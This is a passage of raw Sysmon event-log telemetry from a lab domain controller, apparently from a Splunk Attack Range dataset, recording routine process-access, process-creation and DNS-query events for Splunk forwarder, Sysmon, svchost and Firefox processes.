Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.491{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:57.614{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:57.614{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:59.645{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000018985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:59.645{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:00.567{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:00.567{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:06.535{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:17.379{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:17.379{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:17.379{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:21.332{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:21.332{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:24.800{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000019000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.831{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net099.84.90.17;99.84.90.69;99.84.90.119;99.84.90.128;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.831{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:99.84.90.128;::ffff:99.84.90.17;::ffff:99.84.90.69;::ffff:99.84.90.119;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.643{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com099.84.90.91;99.84.90.106;99.84.90.28;99.84.90.78;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.642{59A5CD1D-945A-6005-3305-00000000A301}7052normandy.cdn.mozilla.net0type: 5 normandy-cdn.services.mozilla.com;::ffff:99.84.90.78;::ffff:99.84.90.91;::ffff:99.84.90.106;::ffff:99.84.90.28;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:28.253{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000019002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:28.020{59A5CD1D-8E56-6005-2E00-00000000A301}246478.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-78.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000019001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.837{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2057:ae00:a:da5e:7900:93a1;2600:9000:2057:c000:a:da5e:7900:93a1;2600:9000:2057:2a00:a:da5e:7900:93a1;2600:9000:2057:6200:a:da5e:7900:93a1;2600:9000:2057:8000:a:da5e:7900:93a1;2600:9000:2057:8600:a:da5e:7900:93a1;2600:9000:2057:8c00:a:da5e:7900:93a1;2600:9000:2057:9800:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000019010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.566{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.550{59A5CD1D-95F5-6005-6D05-00000000A301}42406928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.397{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 